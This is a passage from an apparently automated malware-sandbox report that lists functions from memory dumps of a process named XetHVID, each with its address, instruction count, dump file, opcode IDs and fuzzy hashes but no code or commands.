                                                                  • Instruction Fuzzy Hash: 0C11C4343002215FEB04B76DD852B6E76E7EBC5B28F00442AE506D77D5CDB5EC4187A5
                                                                  Function 08CFC310 Relevance: .1, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5f33cba2eb5b5bca899a1f9b36b78f9dd77b41ec87bfa5a0b3d76e8e58e71840
                                                                  • Instruction ID: 9e9bfb11de0d4064f3315ac894ef22f430ab93d317954a38e62ed3a7eb6d7cb1
                                                                  • Opcode Fuzzy Hash: 5f33cba2eb5b5bca899a1f9b36b78f9dd77b41ec87bfa5a0b3d76e8e58e71840
                                                                  • Instruction Fuzzy Hash: 4D218E30910649CFDB15EF68C8556EEBBF1EF4A305F00852DD546BB250EB30A948DBA1
                                                                  Function 073C17CD Relevance: .1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3ce0c56a20aed4c86da6ba211480ac171e25a8edf4a969f6ddc92afac276a6a5
                                                                  • Instruction ID: f83f104a5cf9d79f9d0311c8362da38d69184c7c9d19d3383ee62f4a892bbe0f
                                                                  • Opcode Fuzzy Hash: 3ce0c56a20aed4c86da6ba211480ac171e25a8edf4a969f6ddc92afac276a6a5
                                                                  • Instruction Fuzzy Hash: 312104F0A1930ADFEB24CB64C6147AD7BB6EF46311F24406DD40AE7692CB358D01DB52
                                                                  Function 073CF390 Relevance: .1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a88c7caaec035b143989955a2d18844a81ce914c0bcc04cd9d2d125ede638111
                                                                  • Instruction ID: ccc8919802b2097ea52a66027c58fa1da0159fa646031ce286b86e55085abac9
                                                                  • Opcode Fuzzy Hash: a88c7caaec035b143989955a2d18844a81ce914c0bcc04cd9d2d125ede638111
                                                                  • Instruction Fuzzy Hash: AF2175F5E1112A8BDB00DFA8C5506EEBBBAFF89301F508525D1097B351DB306E46CBA1
                                                                  Function 08CF9718 Relevance: .1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fabfaf8e4e9c3bdcf3394f90489b8159d8ffa866b048059cfeeb63088bd7972a
                                                                  • Instruction ID: b7a1a216088bea732e5d3bcaba6b711ef707a69614ace460b49479953b7b6545
                                                                  • Opcode Fuzzy Hash: fabfaf8e4e9c3bdcf3394f90489b8159d8ffa866b048059cfeeb63088bd7972a
                                                                  • Instruction Fuzzy Hash: 4111C476F00116EFDB916A95E9441EEFFB4EB40346F604C75D68DF2245E2308A318F94
                                                                  Function 073C3FC8 Relevance: .1, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a7725047d1a56d93f096568d3e48aea5c6eb949234d461c8b8bc1095f65cc1b1
                                                                  • Instruction ID: eb3a54ce339ce886728739c802989a33bd54eb6d5494bfefed0b74f0515b15f3
                                                                  • Opcode Fuzzy Hash: a7725047d1a56d93f096568d3e48aea5c6eb949234d461c8b8bc1095f65cc1b1
                                                                  • Instruction Fuzzy Hash: 78112571B083502FC715DBBD98605AFBFFA8F85210F0544ABE909DB782EA249C0683F1
                                                                  Function 08CFE330 Relevance: .1, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 88409c7039e670efc59abfed34477280f096813162b7ef3dbd38e5c116a64265
                                                                  • Instruction ID: 733c61ef40341545274e2dd35f54fd47f425c52aead0c978c18049bb37e7782b
                                                                  • Opcode Fuzzy Hash: 88409c7039e670efc59abfed34477280f096813162b7ef3dbd38e5c116a64265
                                                                  • Instruction Fuzzy Hash: E41129353142918FD7528728C8585AE3BE5DF8A21171940EBD149CF3B3CA24DC4787A1
                                                                  Function 073C22EA Relevance: .1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cac7fd324af9ae96b3c3a5a79850a7e19ca052d334ccdb836328c1b692455e09
                                                                  • Instruction ID: b3f9d366674cde1368ae07cc211bd459a79326b353eb8bb23dea1c6faf353530
                                                                  • Opcode Fuzzy Hash: cac7fd324af9ae96b3c3a5a79850a7e19ca052d334ccdb836328c1b692455e09
                                                                  • Instruction Fuzzy Hash: FB1159B13103019FEB54DFA8E481A6B7BA6FBC9311F948529E80DCB355DF359C428B61
                                                                  Function 08CFB1E0 Relevance: .1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c3b95862c745bcb5bda6e251ce7ce275fabb6303e29b41ee098abb112d81427a
                                                                  • Instruction ID: a8c8c20ad1ca67ac65fe414aaca04452c8ae602571c70ad84e96362cd23019d6
                                                                  • Opcode Fuzzy Hash: c3b95862c745bcb5bda6e251ce7ce275fabb6303e29b41ee098abb112d81427a
                                                                  • Instruction Fuzzy Hash: FE118771A0420A8FEB91DFA9C8507AEBBF9BF88255F50053EC608D7241EB349A01CB61
                                                                  Function 073C29D0 Relevance: .1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 85f369140c0a4b3c948cebb0468944a70cb411f7e1c8a1399be535c68ae13102
                                                                  • Instruction ID: b5432c7ede1083f7522d2523b53e2bf7d6b03f9ef82fbb04bbc1c2eeca1a076d
                                                                  • Opcode Fuzzy Hash: 85f369140c0a4b3c948cebb0468944a70cb411f7e1c8a1399be535c68ae13102
                                                                  • Instruction Fuzzy Hash: B1118CB8711602CFEB10EB64E548BABBBF4FB49361F054029E419C7680DB309C05CBA0
                                                                  Function 0563A6B1 Relevance: .1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 92af66511b739aea76e98a95800324cc399e0d5890dd665f39448f616a3593cc
                                                                  • Instruction ID: 47007e950feb98f21ce799c4becccdeb34020b24fb4c93b785a63ead7d48ca03
                                                                  • Opcode Fuzzy Hash: 92af66511b739aea76e98a95800324cc399e0d5890dd665f39448f616a3593cc
                                                                  • Instruction Fuzzy Hash: 331186313246014FE7159A68D883B5FBBF7F788725F504829E586D7780DE75A8068790
                                                                  Function 0563758C Relevance: .1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 11f119b9f5a7e978a13f48033cf1b07f6cd5852dac72866be8759b323ec99c27
                                                                  • Instruction ID: fcbe430ccf6be0c2f8f3653ef91818efada84ce74ead7efcd464ae7ed183edf7
                                                                  • Opcode Fuzzy Hash: 11f119b9f5a7e978a13f48033cf1b07f6cd5852dac72866be8759b323ec99c27
                                                                  • Instruction Fuzzy Hash: 8B11E5313246018BE7149A6CD883B5FBBFBFB88714F504829F58AC7780DE74B80287A0
                                                                  Function 073C59F4 Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 740440db5ca1cec19e6f64771e1fcf3fd56d64512648b59552d37972afbd1a90
                                                                  • Instruction ID: 688642c933c2f7cea05eb0a03d195c87b2dc0f7c0b1e5ba4389aa0a38a9599f7
                                                                  • Opcode Fuzzy Hash: 740440db5ca1cec19e6f64771e1fcf3fd56d64512648b59552d37972afbd1a90
                                                                  • Instruction Fuzzy Hash: F421FFB5900349AFCB10DF9AD888ADEBFF5EB48320F10841AE919A7210C775A954CFA5
                                                                  Function 00D9D1AF Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1722105506.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_d9d000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                  • Instruction ID: 1ca7fb71471fd332920ddbfd3f81d1a7cf2bb63e5af0cdb66c76bb8455e7fb0b
                                                                  • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                  • Instruction Fuzzy Hash: DB119D75504280DFDB06CF54D5C4B15BBB2FB84328F28C6AED8494B696C33AD84ACBA1
                                                                  Function 00D9D367 Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1722105506.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_d9d000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                  • Instruction ID: 6f9d26c991157000897f7ae9b72b12db055da81880a0fbd0dc6b12a410060f8e
                                                                  • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                  • Instruction Fuzzy Hash: 8E11BB75504280CFCB02CF14D5C4B15BBB2FB84328F28C6ADD8094B696C33AE84ACB62
                                                                  Function 08CFADF1 Relevance: .1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 21a886ca97c17778805723557f01881d77591f80a263b65f749de888c22435e5
                                                                  • Instruction ID: b6484e4c77ee42d9819c61ad867079cf922c21a8170d6f33ba40d31ee770382c
                                                                  • Opcode Fuzzy Hash: 21a886ca97c17778805723557f01881d77591f80a263b65f749de888c22435e5
                                                                  • Instruction Fuzzy Hash: 5B016876E09291AFD7832725DD140D8BFF08B42205B0908BBC58DE7393E1304A298F91
                                                                  Function 0563E690 Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d02d4fb11a851194b207b41e60b5e489e82aaa379730deb20aac60550f67a55c
                                                                  • Instruction ID: 23a7e6dc8ba114fe0da0438c8175f612fed6abe34b09a057fafb98fa78925a2c
                                                                  • Opcode Fuzzy Hash: d02d4fb11a851194b207b41e60b5e489e82aaa379730deb20aac60550f67a55c
                                                                  • Instruction Fuzzy Hash: 5E11F3B5C047499FCB20DF9AD445A9EFBF5EB88320F10841AD859A7310D778A944CFA5
                                                                  Function 0563E844 Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 40e9c37097a0ce638e75128022078b4b3de5355d454a428149bef483b648ec8b
                                                                  • Instruction ID: 970f6e9ec0d2a51d01dbc1e94a08d18e44761b9d219290330480879698e1866b
                                                                  • Opcode Fuzzy Hash: 40e9c37097a0ce638e75128022078b4b3de5355d454a428149bef483b648ec8b
                                                                  • Instruction Fuzzy Hash: 831134B5C043489FCB20DF9AD444B9EFBF4EB88320F10841AD859A3310D378A944CFA1
                                                                  Function 0563F239 Relevance: .0, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 051f1f936028799d883fcabebd3c8825f5cd075b2c2e5ecb5c5fa93a15daf980
                                                                  • Instruction ID: ebaa901961c7c5b83e608b4ea0f6071a0c4c47d54051b7fb36c6babdcaba7ef8
                                                                  • Opcode Fuzzy Hash: 051f1f936028799d883fcabebd3c8825f5cd075b2c2e5ecb5c5fa93a15daf980
                                                                  • Instruction Fuzzy Hash: D71102B5C003499FCB10DF9AD845A9EFBF9EB88320F14841AD859A3310D778A944CFA5
                                                                  Function 08CFC432 Relevance: .0, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eafee97679025629acc567f36ef7132bac3a1d964aedadddabe8d630e32e4cbe
                                                                  • Instruction ID: 3831cc4c702b83f5b99aba62c95a8d84625d47bf6b515c62b8310a4a84c0d2d6
                                                                  • Opcode Fuzzy Hash: eafee97679025629acc567f36ef7132bac3a1d964aedadddabe8d630e32e4cbe
                                                                  • Instruction Fuzzy Hash: 9B017C763141649FD744DB69C85486ABBFAEF9A61531540AAE501CB3B2CA31DD01CB60
                                                                  Function 08CF9708 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: df6865dc8a3b172c447dc0254d7c590069f5806ebee99855144d6011c068c0fa
                                                                  • Instruction ID: 07549a6f70344f57c983d52b762c52ff91da55109036b87c18a1cf02e1b8a0b0
                                                                  • Opcode Fuzzy Hash: df6865dc8a3b172c447dc0254d7c590069f5806ebee99855144d6011c068c0fa
                                                                  • Instruction Fuzzy Hash: 940178713141248FD794DA6EC89487EBBFAEF89A1531444BAFA01CB3B1CA71DC01CB94
                                                                  Function 0563AFE2 Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3d4988285234061a8159a15f7314c91c9ea087199633dd3f66504eba64a3aacd
                                                                  • Instruction ID: fb654c4d227cd86b2ddda40fd8406c9699292f99177379a4b61bdbc917c9e9a9
                                                                  • Opcode Fuzzy Hash: 3d4988285234061a8159a15f7314c91c9ea087199633dd3f66504eba64a3aacd
                                                                  • Instruction Fuzzy Hash: 3E11A171A042098FDB14EFB5C15A7AD7AB2EF88351F14446DD412A73A0DB784A84CFA9
                                                                  Function 08CFF010 Relevance: .0, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7ab4a4476121936e58c73521c119488bb0da75a5bbbc119a03508d8df083617e
                                                                  • Instruction ID: 08dcf7d768822bc235060da1ccc6d71f3da1ff37152dbf2b863daac437212427
                                                                  • Opcode Fuzzy Hash: 7ab4a4476121936e58c73521c119488bb0da75a5bbbc119a03508d8df083617e
                                                                  • Instruction Fuzzy Hash: BA11CE74D0021A8FEB44EFA8C8026AEBBF1EF08304F008539DA15FB352DB748645CB91
                                                                  Function 08CFE1E8 Relevance: .0, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f636aa5ab9fbee855cdb74ec1716b32b94796302d025673b9df17b41b79f0adb
                                                                  • Instruction ID: 69d2a2b66e046f18552c3982ac7ba24b8a5be68c0f743c23617a0e3dca31afc1
                                                                  • Opcode Fuzzy Hash: f636aa5ab9fbee855cdb74ec1716b32b94796302d025673b9df17b41b79f0adb
                                                                  • Instruction Fuzzy Hash: B20128329103199FCB01EB64DC444DABB76FFD9300B15863BE0056B211EB309699CBD0
                                                                  Function 0563F770 Relevance: .0, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8708b54999c80e047f633954cba4e859c0a50b588909e5384ff566df8eef5662
                                                                  • Instruction ID: 2100ab12a9b2f4141da7aad64ff0663835d12a67c4b7389f6662e6137fb24d99
                                                                  • Opcode Fuzzy Hash: 8708b54999c80e047f633954cba4e859c0a50b588909e5384ff566df8eef5662
                                                                  • Instruction Fuzzy Hash: 0AF0CD75B001545BCF05E7A998565BEBFBEEB84650F04012DE50597340EA760E11C7EF
                                                                  Function 00D8D76D Relevance: .0, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1722045691.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_d8d000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b866a5f391f7d6d9b09a549667c7cac98adda065309cb0652176699de22bbf7b
                                                                  • Instruction ID: 10efa4c627a1fd2227c32905d5f46ead122036babe87f05f10f51f2a64943608
                                                                  • Opcode Fuzzy Hash: b866a5f391f7d6d9b09a549667c7cac98adda065309cb0652176699de22bbf7b
                                                                  • Instruction Fuzzy Hash: 4001D671008344AAE710AA19DCC4B66FFD9DF61325F1CC42AED4A4A2C6C778DC44D7B1
                                                                  Function 073C4DD0 Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0f47e63bef75f592d5c508bcf984a7e1049265dd224e6f7fefe9bed3f2fd6837
                                                                  • Instruction ID: 0e3475102353aa2e13e832e27b7265642cffbfe974c5711a9272cba50e799d5a
                                                                  • Opcode Fuzzy Hash: 0f47e63bef75f592d5c508bcf984a7e1049265dd224e6f7fefe9bed3f2fd6837
                                                                  • Instruction Fuzzy Hash: 26018172615259AFCB014F68D8058AEBFBAFF882207008027F905C3351DF314D22DBA1
                                                                  Function 08CFF020 Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fcfb12bd68ac3c192f6aa7f7f4c0c112d2677b7062f2d33ab45209e02350805a
                                                                  • Instruction ID: 7f67678659544b383a19c3cc0bc86de5f83a3e577accbeb389821635f98b90b1
                                                                  • Opcode Fuzzy Hash: fcfb12bd68ac3c192f6aa7f7f4c0c112d2677b7062f2d33ab45209e02350805a
                                                                  • Instruction Fuzzy Hash: DC018C34D0021E9FEB44EFA8D8116AEBBB1EF49304F108539D615F7391EB749645CB91
                                                                  Function 0563A431 Relevance: .0, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ef69229d943cf7ee2b8117f9bb3279a1652b17443a24d0894affddc4d4591ea5
                                                                  • Instruction ID: 35e4d9cda2b5d5a513840804f54d4434f4d5f143bacdbc150ea29b476b0655c8
                                                                  • Opcode Fuzzy Hash: ef69229d943cf7ee2b8117f9bb3279a1652b17443a24d0894affddc4d4591ea5
                                                                  • Instruction Fuzzy Hash: 7DF0C8326052559BD704DF59EC45AFFBBAAFFC1610F05822AE01593601DB355801C7D4
                                                                  Function 073C2800 Relevance: .0, Instructions: 39COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7ee31207d545a6a328e94a4077168eb358a2c3a425cc02ef94f806419067154b
                                                                  • Instruction ID: 517e87ab261c5f6eb2faecd6ad29e7e740ae28bfca2e5614c2b8216b6c6d7611
                                                                  • Opcode Fuzzy Hash: 7ee31207d545a6a328e94a4077168eb358a2c3a425cc02ef94f806419067154b
                                                                  • Instruction Fuzzy Hash: A4F096767117009FD3155F68E445A967FA1FBD9321F15C07BE549CB280CA358815C7A0
                                                                  Function 08CFE1F8 Relevance: .0, Instructions: 39COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2ff64be1dc8686d9bb5ce53e8750436b0b781f73aa3b53c2f9ce5a5f070cda16
                                                                  • Instruction ID: 0b0929720a3c8938599d5de8d886f0c7dbc08e914836fd41845c3eccc0d165ef
                                                                  • Opcode Fuzzy Hash: 2ff64be1dc8686d9bb5ce53e8750436b0b781f73aa3b53c2f9ce5a5f070cda16
                                                                  • Instruction Fuzzy Hash: 0A01D632A1060A9BCF00EFA4DC444CEFB76FFD5305F108639E10527211EB70A595CB90
                                                                  Function 08CF9328 Relevance: .0, Instructions: 39COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ea4ed465fa469a06018e566a3aa82a14717152155194d8e6defbbc38adb4ef61
                                                                  • Instruction ID: 0b12e9f8ed6f9556ee35dc0a682a4b46e5dd456b5f5b4dda0530b7777eaa0795
                                                                  • Opcode Fuzzy Hash: ea4ed465fa469a06018e566a3aa82a14717152155194d8e6defbbc38adb4ef61
                                                                  • Instruction Fuzzy Hash: 2901F432A106159FCB12EB6DD8848DEFFB4FF8620031042ABE5449B321DB305D04CBE2
                                                                  Function 08CFB800 Relevance: .0, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
